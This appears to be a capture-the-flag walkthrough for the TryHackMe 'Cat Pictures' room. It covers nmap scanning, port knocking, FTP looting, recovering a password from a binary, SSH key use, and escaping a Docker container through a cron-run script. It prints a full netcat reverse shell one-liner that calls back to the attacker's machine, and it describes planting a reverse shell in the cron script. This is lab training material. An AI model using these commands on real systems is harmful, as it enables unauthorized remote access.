Cat Pictures

https://tryhackme.com/room/catpictures

User flag

As usually, we start with our nmap enumeration.

nmap -T4 -A -p- 10.10.192.184

We see there are three open ports (22, 4420, 8080). If we take a look at the 4420 we get the following:

So let's head to the port 80 and see what we find.

It looks like the classic ol' forum. Let's take a look around and see if we can find something interesting.

Knock, knock? That means something... Run the following command on the console (Port Knocking):

for PORT in 1111 2222 3333 4444; do nmap -PN 10.10.192.184 -p $PORT; done

If we run another nmap scan we can find a new open port on the network:

Now we can try to connect to the ftp server and get everything we can.

We find an interesting note that gives us a password for the internal shell we found earlier.

If we connect to port 4420 and enter the password we found we get access to the internal shell.

Now we can try to get a regular shell from this one. Run this command on the internal shell (Don't forget to start a listener on your machine):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.36.103 9001 >/tmp/f

Once in the new shell we can use the "cd" command and look around the system.

Let's do what it says and run it.

Damn, we have to find the correct password.

After a while trying to find the password in different folders with no success we decided to cat the "runme" binary and we did find something interesting:

If we try "rebecca" as the password we get a ssh key.

Let's get that id_rsa to our machine and use it to ssh into the victim.

We're in and by the looks of it, it seems like we are in a container.

Root flag

Now we have to break out the docker container. After using linpeas to get info about the system we could see the following:

Let's read the .bash_history file

Kind of confusing at first. We can assume there's a cronjob running /opt/clean/clean.sh outside the docker by the way the user edited the file.

To check if we're correct we can edit the file and put a reverse shell on it and see if we get it.

After a few seconds we get the shell and the root flag.

PreviousSourceNextMustacchio

Last updated

Was this helpful?